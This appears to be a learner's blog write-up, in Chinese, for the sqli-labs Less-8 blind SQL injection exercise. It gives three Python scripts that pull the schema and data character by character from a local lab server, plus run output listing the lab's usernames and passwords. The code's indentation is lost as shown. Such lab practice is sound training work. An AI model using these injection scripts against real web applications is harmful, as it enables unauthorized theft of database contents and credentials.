以下是sql-labs 第八关的python脚本
唉,调试了好久
python的循环是没有{}的,所以大家写的时候一定要注意哪个嵌套哪个,缩进一定要弄好,不能错,否则就算不报错,运行结果也不对(╬▔皿▔)╯
import requests
header = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0',
'Accept-Language': 'zh-CN,zh;q=0.9',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8'
}
database_length = 0
database_name = ''
table_counts = 0
table_length = 0
table_name = ''
column_counts = 0
column_length = 0
column_name = ''
information_counts = 0
information_length = 0
information_name = ''
base_url = "http://127.0.0.1/sql-labs/Less-8/?id=1'"
# 数据库长度
for i in range(1, 50):
payload = f' and length(database())={i} --+'
new_url = base_url + payload
response = requests.get(new_url, headers=header)
if 'You are in...........' in response.text:
database_length = i
break
# 数据库名称
for i in range(1, database_length + 1):
for m in range(65, 123):
payload = f' and substr(database(),{i},1)=%27{chr(m)}%27 --+'
new_url = base_url + payload
response = requests.get(new_url, headers=header)
if 'You' in response.text:
database_name = database_name + chr(m)
break
# 表的数量
for i in range(1, 100):
payload = f' and (select count(table_name) from information_schema.tables where table_schema=%27security%27)={i} --+'
new_url = base_url + payload
response = requests.get(new_url, headers=header)
if 'You are in...........' in response.text:
table_counts = i
break
# 表的长度和名称
for i in range(1, table_counts + 1):
table_name = ''
for m in range(1, 50):
payload = f' and length((select table_name from information_schema.tables where table_schema=%27security%27 limit {i},1))={m} --+'
new_url = base_url + payload
response = requests.get(new_url, headers=header)
if 'You are in...........' in response.text:
table_length = m
break
for m in range(1, table_length + 1):
for n in range(65, 123):
payload = f' and substr((select table_name from information_schema.tables where table_schema=%27security%27 limit {i},1),{m},1)=%27{chr(n)}%27 --+'
new_url = base_url + payload
response = requests.get(new_url, headers=header)
if 'You are in...........' in response.text:
table_name = table_name + chr(n)
break
print(f'表{i}的名称为:' + table_name.lower())
for a in range(1, 100):
payload = f' and (select count(column_name) from information_schema.columns where table_name=%27{table_name.lower()}%27 and table_schema=%27security%27)={a} --+'
new_url = base_url + payload
response = requests.get(new_url, headers=header)
if 'You are in...........' in response.text:
column_counts = a
break
# 各列的长度名称
for b in range(1, column_counts + 1):
column_name = ''
for c in range(1, 50):
payload = f' and length((select column_name from information_schema.columns where table_name=%27{table_name.lower()}%27 and table_schema=%27security%27 limit {b},1))={c} --+'
new_url = base_url + payload
response = requests.get(new_url, headers=header)
if 'You are in...........' in response.text:
column_length = c
break
for m in range(1, column_length + 1):
for n in range(65, 123):
payload = f' and substr((select column_name from information_schema.columns where table_name=%27{table_name.lower()}%27 and table_schema=%27security%27 limit {b},1),{m},1)=%27{chr(n)}%27 --+'
new_url = base_url + payload
response = requests.get(new_url, headers=header)
if 'You are in...........' in response.text:
column_name = column_name + chr(n)
break
print(f'列{b}的名称为:' + column_name.lower())
# 列下的数据的数量,长度,名称
for x in range(0, 100):
payload = f' and (select count({column_name.lower()}) from {table_name.lower()})={x} --+'
new_url = base_url + payload
response = requests.get(new_url, headers=header)
if 'You are in...........' in response.text:
information_counts = x
break
for y in range(1, information_counts + 1):
information_name = ''
for z in range(1, 50):
payload = f' and length((select {column_name.lower()} from {table_name.lower()} limit {y},1))={z} --+'
new_url = base_url + payload
response = requests.get(new_url, headers=header)
if 'You are in...........' in response.text:
information_length = z
break
for j in range(1, information_length + 1):
for k in range(65, 123):
payload = f' and substr((select {column_name.lower()} from {table_name.lower()} limit {y},1),{j},1)=%27{chr(k)}%27 --+'
new_url = base_url + payload
response = requests.get(new_url, headers=header)
if 'You are in...........' in response.text:
information_name = information_name + chr(k)
break
print(f'数据{y}的名称为:' + information_name.lower())
print('数据库名称为:' + database_name)
print('该数据库下表的个数为:' + str(table_counts))
运行结果
E:\python\python.exe "D:\python\test1\aql-labs\less-8 三.py"
表1的名称为:referers
列1的名称为:referer
列2的名称为:ip_address
列3的名称为:
表2的名称为:uagents
列1的名称为:uagent
列2的名称为:ip_address
列3的名称为:username
列4的名称为:
表3的名称为:users
列1的名称为:username
数据1的名称为:angelina
数据2的名称为:dummy
数据3的名称为:secure
数据4的名称为:stupid
数据5的名称为:superman
数据6的名称为:batman
数据7的名称为:admin
数据8的名称为:admin
数据9的名称为:admin
数据10的名称为:admin
数据11的名称为:dhakkan
数据12的名称为:admin
数据13的名称为:
列2的名称为:password
数据1的名称为:ikillyou
数据2的名称为:pssword
数据3的名称为:crappy
数据4的名称为:stupidity
数据5的名称为:genious
数据6的名称为:moble
数据7的名称为:admin
数据8的名称为:admin
数据9的名称为:admin
数据10的名称为:admin
数据11的名称为:dumbo
数据12的名称为:admin
数据13的名称为:
列3的名称为:
数据1的名称为:
数据2的名称为:
数据3的名称为:
刚开始学着写,可能并不好
我还看到一种代码,比我的这个好多了
# 1. 设置全局变量DIS 和list用于控制详细信息的显示以及定义需要爆破的ASCII码
# 2. 爆破当前数据库长度
# 3. 定义数据库长度爆破函数Brute_length()
# 4. 爆破当前数据库名称
# 5. 定义数据库名爆破函数Brute_database()
# 6. 爆破所有数据库长度
# 7. 爆破所有数据库名称
# 8. 爆破表名
# 9. 定义表名爆破函数Brute_table()
# 10. 爆破字段名
# 11. 定义字段爆破函数Brute_column()
# 12. 爆破数据
# 13. 定义数据爆破函数data_dump()
import requests
import time
import sys
# 1. 设置全局变量DIS 和list用于控制详细信息的显示以及定义需要爆破的ASCII码
DIS = True
list = [44, 46, 95, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58]
for i in range(97, 123):
list.append(i)
for i in range(64, 91):
list.append(i)
for i in range(33, 76):
list.append(i)
def sql_Inject(url, flag, display):
global DIS
DIS = display
# 2. 爆破当前数据库长度
current_length = Brute_length(url, flag, current=True)
print("当前数据库长度:", current_length)
# 4. 爆破当前数据库名称
current_database_name = Brute_database(url, current_length, flag, current=True)
print("当前数据库名称:", current_database_name)
# 6. 爆破所有数据库长度
length = Brute_length(url, flag)
print("数据库全长:", length)
# 7. 爆破所有数据库名称
all_databases = input("Brute all the databases?[yes/no]: ")
if all_databases == 'yes':
database_name = Brute_database(url, length, flag)
print("数据库名称:", database_name)
# 8. 爆破表名
while True:
choose_database = input("choose the database: ")
table_name = Brute_table(url, choose_database, flag)
print("数据库: %s" % choose_database)
print("表: %s" % table_name)
print('')
next = input("continue brute the tables?[yes/no]: ")
if next == "no":
break
# 10. 爆破字段名
while True:
choose_database = input("choose the database: ")
choose_table = input("choose the table: ")
column_name = Brute_column(url, choose_database, choose_table, flag)
print("表: %s.%s" % (choose_database, choose_table))
print("字段: %s" % column_name)
print('')
next = input("continue brute the columns?[yes/no]: ")
if next == "no":
break
# 12. 爆破数据
while True:
choose_database = input("choose the database: ")
choose_table = input("choose the table: ")
choose_column = input("choose the column: ")
data = data_dump(url, choose_database, choose_table, choose_column, flag)
print("字段: %s.%s.%s" % (choose_database, choose_table, choose_column))
print("数据: %s" % data)
print('')
next = input("continue dump the data?[yes/no]: ")
if next == "no":
break
# 13. 定义数据爆破函数data_dump()
def data_dump(url, database, table, column, flag):
raw_url = url
length = 1
jump = 10
data = ""
# 首先判断数据长度
while True:
# url: http://127.0.0.1/sql-labs/Less-8/?id=1' and length((select group_concat(id) from security.emails))>10 --+
url = raw_url + "' and length((select group_concat(%s) from %s.%s))>%d --+" % (column, database, table, jump)
response = requests.get(url)
if DIS:
print(url)
if flag in response.content:
jump += 10
else:
jump -= 10
break
while True:
# url: http://127.0.0.1/sql-labs/Less-8/?id=1' and length((select group_concat(id) from security.emails))>11 --+
url = raw_url + "' and length((select group_concat(%s) from %s.%s))>%d --+" % (column, database, table, jump + length)
if DIS:
print(url)
response = requests.get(url)
if flag in response.content:
length += 1
else:
break
data_length = length + jump
# 爆破数据
for i in range(data_length):
for ASCII in list:
# url: http://127.0.0.1/sqli-labs/Less-8/?id=1' and ord(substr((select group_concat(id) from security.emails),1,1))='44'--+
url = raw_url + "' and ord(substr((select group_concat(%s) from %s.%s),%d,1))=%d --+" % (column, database, table, i + 1, ASCII)
if DIS:
print(url)
response = requests.get(url)
if flag in response.content:
data += chr(ASCII)
break
# time.sleep(5)
return data
# 11. 定义字段爆破函数Brute_column()
def Brute_column(url, database, table, flag):
raw_url = url
length = 1
jump = 10
column_name = ""
# 首先判断字段长度
while True:
# url: http://127.0.0.1/sqli-labs/Less-8/?id=1' and length((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='emails'))>10 --+
url = raw_url + "' and length((select group_concat(column_name) from information_schema.columns where table_schema='%s' and table_name='%s'))>%d --+" % (database, table, jump)
response = requests.get(url)
if DIS:
print(url)
if flag in response.content:
jump += 10
else:
jump -= 10
break
while True:
# url: http://127.0.0.1/sqli-labs/Less-8/?id=1' and length((select group_concat(table_name) from information_schema.tables where table_schema="security"))>11 --+
url = raw_url + "' and length((select group_concat(column_name) from information_schema.columns where table_schema='%s' and table_name='%s'))>%d --+" % (database, table, jump + length)
if DIS:
print(url)
response = requests.get(url)
if flag in response.content:
length += 1
else:
break
column_length = length + jump
# 爆破字段名
for i in range(column_length):
for ASCII in list:
# url: http://127.0.0.1/sqli-labs/Less-8/?id=1' and ord(substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='emails'),1,1))='44'--+
url = raw_url + "' and ord(substr((select group_concat(column_name) from information_schema.columns where table_schema='%s' and table_name='%s'),%d,1))=%d --+" % (database, table, i + 1, ASCII)
if DIS:
print(url)
response = requests.get(url)
if flag in response.content:
column_name += chr(ASCII)
break
# time.sleep(5)
return column_name
# 9. 定义表名爆破函数Brute_table()
def Brute_table(url, database, flag):
raw_url = url
length = 1
jump = 10
table_name = ""
# 首先判断表名长度
while True:
# url: http://127.0.0.1/sqli-labs/Less-8/?id=1' and length((select group_concat(table_name) from information_schema.tables where table_schema="security"))>10 --+
url = raw_url + "' and length((select group_concat(table_name) from information_schema.tables where table_schema='%s'))>%d --+" % (database, jump)
response = requests.get(url)
if DIS:
print(url)
if flag in response.content:
jump += 10
else:
jump -= 10
break
while True:
# url: http://127.0.0.1/sqli-labs/Less-8/?id=1' and length((select group_concat(table_name) from information_schema.tables where table_schema="security"))>11 --+
url = raw_url + "' and length((select group_concat(table_name) from information_schema.tables where table_schema='%s'))>%d --+" % (database, jump + length)
if DIS:
print(url)
response = requests.get(url)
if flag in response.content:
length += 1
else:
break
table_length = length + jump
# 爆破表名
for i in range(table_length):
for ASCII in list:
# url: http://127.0.0.1/sqli-labs/Less-8/?id=1' and ord(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,1))='44'--+
url = raw_url + "' and ord(substr((select group_concat(table_name) from information_schema.tables where table_schema='%s'),%d,1))=%d --+" % (database, i + 1, ASCII)
if DIS:
print(url)
response = requests.get(url)
if flag in response.content:
table_name += chr(ASCII)
break
# time.sleep(5)
return table_name
# 5. 定义数据库名爆破函数Brute_database()
def Brute_database(url, length, flag, current=False):
raw_url = url
database_name = ""
# 2. 爆破当前数据库名称
if current:
for i in range(length):
for ASCII in range(97, 123):
# url: http://127.0.0.1/sqli-labs/Less-8/?id=1' and ord(substr(database(),1,1))=97 --+
url = raw_url + "' and ord(substr(database(),%d,1))=%d --+" % (i+1, ASCII)
if DIS:
print(url)
response = requests.get(url)
if flag in response.content:
database_name += chr(ASCII)
break
# time.sleep(5)
return database_name
# 爆破所有数据库名称
# ' and ord(substr((select group_concat(schema_name) from information_schema.schemata),1,1))=97--+
else:
for i in range(length):
for ASCII in list:
# url: http://127.0.0.1/sqli-labs/Less-8/?id=1' and ord(substr((select group_concat(schema_name) from information_schema.schemata),1,1))=44--+
url = raw_url + "' and ord(substr((select group_concat(schema_name) from information_schema.schemata),%d,1))=%d --+" % (i+1, ASCII)
if DIS:
print(url)
response = requests.get(url)
if flag in response.content:
database_name += chr(ASCII)
break
# time.sleep(5)
return database_name
# 3. 定义数据库长度爆破函数Brute_length()
def Brute_length(url, flag, current=False):
length = 1
raw_url = url
jump = 10
# 判断是否爆破当前数据库
if current:
while True:
# url: http://127.0.0.1/sqli-labs/Less-8/?id=1' and length(database())>1 --+
url = raw_url + "' and length(database())>%d --+" % length
if DIS:
print(url)
response = requests.get(url)
if flag in response.content:
length += 1
else:
break
return length
# 爆破所有数据库长度
else:
while True:
# url: http://127.0.0.1/sqli-labs/Less-8/?id=1' and length((select group_concat(schema_name) from information_schema.schemata))>10 --+
url = raw_url + "' and length((select group_concat(schema_name) from information_schema.schemata))>%d --+" % jump
response = requests.get(url)
if DIS:
print(url)
if flag in response.content:
jump += 10
else:
jump -= 10
break
while True:
# url: http://127.0.0.1/sqli-labs/Less-8/?id=1' and length((select group_concat(schema_name) from information_schema.schemata))>1 --+
url = raw_url + "' and length((select group_concat(schema_name) from information_schema.schemata))>%d --+" % (jump+length)
if DIS:
print(url)
response = requests.get(url)
if flag in response.content:
length += 1
else:
break
return (length+jump)
if __name__ == "__main__":
url = "http://127.0.0.1/sql-labs/Less-8/?id=1"
flag = b'You are in...........'
display = False
sql_Inject(url, flag, display)
运行结果
E:\python\python.exe D:\python\test1\aql-labs\less-8.py
当前数据库长度: 8
当前数据库名称: security
数据库全长: 67
Brute all the databases?[yes/no]: yes
数据库名称: information_schema,challenges,mysql,performance_schema,security,sys
choose the database: security
数据库: security
表: emails,referers,uagents,users
continue brute the tables?[yes/no]: no
choose the database: security
choose the table: users
表: security.users
字段: id,username,password
continue brute the columns?[yes/no]: no
choose the database: security
choose the table: users
choose the column: username,password
字段: security.users.username,password
数据: DumbDumb,AngelinaI-kill-you,Dummyp@ssword,securecrappy,stupidstupidity,supermangenious,batmanmob!le,adminadmin,admin1admin1,admin2admin2,admin3admin3,dhakkandumbo,admin4admin4
continue dump the data?[yes/no]: no
进程已结束,退出代码为 0
人家的这个一目了然
不过这两种代码爆破还是有点慢的,可以使用二分法
import requests
def decide():
left = 0
right = 9
while left <= right:
middle = (left + right) // 2
if 'You are in...........' in requests.request('get',
f"http://127.0.0.1/sql-labs/Less-8/?id=1' and if(substr(length(length(database())), 1, 1)>{middle}, 1, 0)--+").text:
left = middle + 1
elif 'You are in...........' in requests.request('get',
f"http://127.0.0.1/sql-labs/Less-8/?id=1' and if(substr(length(length(database())), 1, 1)<{middle}, 1, 0)--+").text:
right = middle - 1
else:
return middle
def ruler(size):
left = 0
right = 9
i = 1
length = ''
while left <= right and i <= size:
middle = (left + right) // 2
if 'You are in...........' in requests.request('get',
f"http://127.0.0.1/sql-labs/Less-8/?id=1' and if(substr(length(database()), {i}, 1)>{middle}, 1, 0)--+").text:
left = middle + 1
elif 'You are in...........' in requests.request('get',
f"http://127.0.0.1/sql-labs/Less-8/?id=1' and if(substr(length(database()), {i}, 1)<{middle}, 1, 0)--+").text:
right = middle - 1
else:
i += 1
length += str(middle)
left = 0
right = 126
return int(length)
def process(length):
left = 32
right = 126
i = 1
result = ''
while left <= right and i <= length:
middle = (left + right) // 2
if 'You are in...........' in requests.request('get',
f"http://127.0.0.1/sql-labs/Less-8/?id=1' and if(ascii(substr(database(), {i}, 1))>{middle}, 1, 0)--+").text:
left = middle + 1
elif 'You are in...........' in requests.request('get',
f"http://127.0.0.1/sql-labs/Less-8/?id=1' and if(ascii(substr(database(), {i}, 1))<{middle}, 1, 0)--+").text:
right = middle - 1
else:
i += 1
result += str(chr(middle))
left = 0
right = 126
print(result)
return result
if __name__ == '__main__':
size = decide()
length = ruler(size)
result = process(length)
这只是一部分代码,运行结果如下
sec
secu
secur
securi
securit
security
进程已结束,退出代码为 0